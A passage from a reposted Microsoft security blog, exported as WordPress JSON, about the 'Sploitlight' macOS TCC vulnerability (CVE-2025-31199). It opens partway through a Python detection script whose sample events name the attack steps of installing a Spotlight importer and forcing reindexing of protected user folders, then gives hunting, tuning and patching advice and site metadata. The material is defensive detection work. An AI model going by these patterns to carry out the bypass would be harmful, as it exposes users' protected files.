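    {'ts': '2025-03-01T10:00:20', 'kind': 'process', 'process': 'mdimport',
     'cmdline': 'mdimport -i ' + USER_HOME + '/Pictures'},
    {'ts': '2025-03-01T11:00:00', 'kind': 'process', 'process': 'mdimport',
     'cmdline': 'mdimport -i ' + USER_HOME + '/Projects/notes'},
    {'ts': '2025-03-01T12:00:00', 'kind': 'file', 'process': 'installer',
     'path': '/Library/Spotlight/Vendor.mdimporter/Contents/Info.plist'},
]

if __name__ == '__main__':
    for alert in detect(SAMPLE_EVENTS):
        print(alert['severity'], alert['rule'], alert['ts'], alert.get('path') or alert.get('cmdline'))
```

<p class=\"wp-block-paragraph\">The same correlation can be expressed in advanced hunting over the <em>DeviceFileEvents<\/em> and <em>DeviceProcessEvents<\/em> tables. Tune <em>TRUSTED_INSTALLERS<\/em> to whatever legitimately installs importers in your fleet (package installers, MDM agents) and extend <em>PROTECTED_DIRS<\/em> with any other TCC-protected paths you care about. <\/p>\n<p class=\"wp-block-paragraph\">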
We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.<\/p>\n<p class=\"wp-block-paragraph\">We encourage users to ensure they have applied the <a href=\"https:\/\/support.apple.com\/en-us\/122373\" target=\"_blank\" rel=\"noreferrer noopener\">security updates<\/a> released by Apple to mitigate this issue.<\/p>\n<p class=\"wp-block-paragraph\">As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.<\/p>\n<p class=\"wp-block-paragraph\"><strong>Jonathan Bar Or<\/strong><\/p>\n<p class=\"wp-block-paragraph\"><strong>Alexia Wilson<\/strong><\/p>\n<p class=\"wp-block-paragraph\"><strong>Christine Fossaceca<\/strong><br \/><em>Microsoft Threat Intelligence<\/em><\/p>\n<h2 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h2>\n<p class=\"wp-block-paragraph\">Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our <a href=\"https:\/\/microsoftsecurityevents.eventbuilder.com\/events\/11f048838dabd650892acff3dd777035?ref=blog\" target=\"_blank\" rel=\"noreferrer noopener\">VIP Mixer at Black Hat 2025<\/a>. 
Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.<\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/get-started-security-copilot\">Security Copilot<\/a>&nbsp;customers can use the standalone experience to&nbsp;<a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/prompting-security-copilot#create-your-own-prompts\" target=\"_blank\" rel=\"noreferrer noopener\">create their own prompts<\/a>&nbsp;or run&nbsp;<a href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/using-promptbooks\" target=\"_blank\" rel=\"noreferrer noopener\">pre-built promptbooks<\/a>&nbsp;to automate incident response or investigation tasks related to this threat.<\/p>\n<p class=\"wp-block-paragraph\">For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:&nbsp;<a href=\"https:\/\/aka.ms\/threatintelblog\">https:\/\/aka.ms\/threatintelblog<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence<\/a>, and on X (formerly Twitter) at&nbsp;<a href=\"https:\/\/x.com\/MsftSecIntel\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/x.com\/MsftSecIntel<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence<\/a>.<\/p>\n<p> READ MORE <a 
href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/07\/28\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft Threat Intelligence has discovered a macOS vulnerability, tracked as CVE-2025-31199, that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), including the ability to extract and leak sensitive information cached by Apple Intelligence.<br \/>\nThe post Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability appeared first on Microsoft Security Blog. READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[],"class_list":["post-59104","post","type-post","status-publish","format-standard","hentry","category-microsoft-secure"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-28T16:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"432\" \/>\n\t<meta property=\"og:image:height\" content=\"435\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability\",\"datePublished\":\"2025-07-28T16:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"},\"wordCount\":2087,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"articleSection\":[\"Microsoft Secure\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\",\"name\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"datePublished\":\"2025-07-28T16:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\",\"contentUrl\":\"https:\\\/\\\/www.microsoft.com\\\/en-us\\\/security\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/image-8.webp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sploitlight: Analyzing a Spotlight-based macOS TCC 
vulnerability\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsH
ub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","og_locale":"en_US","og_type":"article","og_title":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-07-28T16:00:00+00:00","og_image":[{"width":432,"height":435,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability","datePublished":"2025-07-28T16:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"},"wordCount":2087,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","articleSection":["Microsoft Secure"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","url":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/","name":"Sploitlight: Analyzing a 
Spotlight-based macOS TCC vulnerability 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","datePublished":"2025-07-28T16:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/07\/image-8.webp"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/sploitlight-analyzing-a-spotlight-based-macos-tcc-vulnerability\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity 
News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 
Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59104","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59104"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59104\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}